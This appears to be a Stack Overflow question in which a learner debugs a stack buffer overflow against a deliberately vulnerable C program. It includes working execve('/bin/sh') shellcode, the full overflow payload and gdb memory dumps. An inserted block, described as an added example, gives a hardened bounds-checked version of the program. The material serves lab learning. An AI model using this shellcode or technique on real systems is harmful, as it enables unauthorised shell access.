Can't recognize the shellcode after overflowing the return address


I'm sure that I got the return address right, but I got a segmentation fault after returning from the main function.

I'm using 32-bit Debian GNU/Linux 10 (buster).

The C program is:

// victim.c
#include <string.h>
int main(int argc, char* argv[]) {
    char little_array[512];

    if(argc > 1)
        strcpy(little_array, argv[1]);

    return 0;
}

Compile it with:

gcc -fno-stack-protector -z execstack -fno-pie -ggdb -mpreferred-stack-boundary=2 victim.c -o victim

My payload is (512 + 8 bytes):

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf"

Explanation:

shellcode (40 bytes): \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

padding (476 bytes): %0476x

new return address (shellcode address on the stack, 4 bytes): \xc8\xee\xff\xbf

Output of gdb:

zoemurmure@debian:~/shellcoders/chapter2$ gdb victim
GNU gdb (Debian 8.2.1-2) 8.2.1
...
(gdb) set args $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")

(gdb) disas main
Dump of assembler code for function main:
   0x00001199 <+0>: push   %ebp
   0x0000119a <+1>: mov    %esp,%ebp
   0x0000119c <+3>: sub    $0x200,%esp
   0x000011a2 <+9>: cmpl   $0x1,0x8(%ebp)
   0x000011a6 <+13>:    jle    0x11c0 <main+39>
   0x000011a8 <+15>:    mov    0xc(%ebp),%eax
   0x000011ab <+18>:    add    $0x4,%eax
   0x000011ae <+21>:    mov    (%eax),%eax
   0x000011b0 <+23>:    push   %eax
   0x000011b1 <+24>:    lea    -0x200(%ebp),%eax
   0x000011b7 <+30>:    push   %eax
   0x000011b8 <+31>:    call   0x11b9 <main+32>
   0x000011bd <+36>:    add    $0x8,%esp
   0x000011c0 <+39>:    mov    $0x0,%eax
   0x000011c5 <+44>:    leave  
   0x000011c6 <+45>:    ret    
End of assembler dump.

(gdb) break main
Breakpoint 1 at 0x11a2: file victim.c, line 5.

(gdb) run
Starting program: /home/zoemurmure/shellcoders/chapter2/victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")

Breakpoint 1, main (argc=2, argv=0xbffff164) at victim.c:5
5       if(argc > 1)

(gdb) n
6           strcpy(little_array, argv[1]);
(gdb) x/20x $esp
0xbfffeec8: 0x00000001  0xb7fffc5c  0x3a5d7643  0x0000a1ab
0xbfffeed8: 0xfffff8a0  0xb7f5c362  0xbfffef01  0x00000000
0xbfffeee8: 0xbfffef28  0x00000007  0xb7fd4128  0x6e43a318
0xbfffeef8: 0xb7fffc50  0xb7fdffad  0x00000000  0x00000000
0xbfffef08: 0xb7fd41a0  0x00000007  0xb7fd41c0  0xb7fffc50
(gdb) x/20x $ebp
0xbffff0c8: 0x00000000  0xb7df8b41  0x00000002  0xbffff164
0xbffff0d8: 0xbffff170  0xbffff0f4  0x00000001  0x00000000
0xbffff0e8: 0xb7fb8000  0xffffffff  0xb7fff000  0x00000000
0xbffff0f8: 0xb7fb8000  0xb7fb8000  0x00000000  0x7f85b6f2
0xbffff108: 0x3f7210e2  0x00000000  0x00000000  0x00000000

(gdb) n
8       return 0;
(gdb) x/20x $esp
0xbfffeec8: 0x315e1aeb  0x074688c0  0x5e891e8d  0x0c468908
0xbfffeed8: 0xf3890bb0  0x8d084e8d  0x80cd0c56  0xffffe1e8
0xbfffeee8: 0x69622fff  0x68732f6e  0x30303030  0x30303030
0xbfffeef8: 0x30303030  0x30303030  0x30303030  0x30303030
0xbfffef08: 0x30303030  0x30303030  0x30303030  0x30303030
(gdb) x/20x $ebp
0xbffff0c8: 0x30303030  0xbfffeec8  0x00000000  0xbffff164
0xbffff0d8: 0xbffff170  0xbffff0f4  0x00000001  0x00000000
0xbffff0e8: 0xb7fb8000  0xffffffff  0xb7fff000  0x00000000
0xbffff0f8: 0xb7fb8000  0xb7fb8000  0x00000000  0x7f85b6f2
0xbffff108: 0x3f7210e2  0x00000000  0x00000000  0x00000000

(gdb) n
9   }
(gdb) n
0xbfffeec8 in ?? ()

Notice that:

  • The starting address of the shellcode on the stack is 0xbfffeec8
  • After executing strcpy(little_array, argv[1]);, you can see that the new return address in the output of x/20x $ebp has been updated to 0xbfffeec8
  • Continuing execution, after returning from the main function, the output is 0xbfffeec8 in ?? ()

What's the problem? Thanks.

Tags: c, stack-overflow, shellcode
asked on Stack Overflow Aug 3, 2019 by zoemurmure
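For contrast with the deliberately vulnerable victim.c above, here is an added, hypothetical hardened counterpart (not part of the question): the unbounded strcpy is replaced by a length-checked copy that rejects any argument that would not fit in the 512-byte array, so the 520-byte payload described in the question never reaches the saved return address. The helper names handle_arg, copy_bounded and handle_repeated are my own; compile it with gcc -fstack-protector-strong victim_fixed.c -o victim_fixed, i.e. without the -fno-stack-protector, -z execstack and -fno-pie flags the question uses to switch the compiler's mitigations off.

```c
// victim_fixed.c (added example, hardened counterpart of the question's victim.c)
#include <stdio.h>
#include <string.h>

#define LITTLE_ARRAY_SIZE 512

/* Copy src into dst[dstsize] only if it fits together with its NUL terminator.
   Returns 0 on success, -1 if the input would overflow (nothing is copied). */
static int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t len = strnlen(src, dstsize);   /* never scans past dstsize bytes */
    if (len >= dstsize)                   /* no room left for the NUL: reject */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* The check main() applies to argv[1], factored out so it can be tested.
   Returns 0 when the argument was accepted, 1 when it was rejected. */
int handle_arg(const char *arg)
{
    char little_array[LITTLE_ARRAY_SIZE];
    if (copy_bounded(little_array, sizeof little_array, arg) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof little_array - 1);
        return 1;
    }
    return 0;
}

/* Test helper: build an argument of n copies of ch and feed it to handle_arg. */
int handle_repeated(char ch, size_t n)
{
    static char buf[1024];
    if (n >= sizeof buf)
        return -1;
    memset(buf, ch, n);
    buf[n] = '\0';
    return handle_arg(buf);
}

int main(int argc, char *argv[])
{
    if (argc > 1)
        return handle_arg(argv[1]);
    return 0;
}
```

With this check in place an oversized argv[1] is reported and dropped instead of overwriting the saved %ebp and return address shown in the x/20x $ebp dump.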

0 Answers

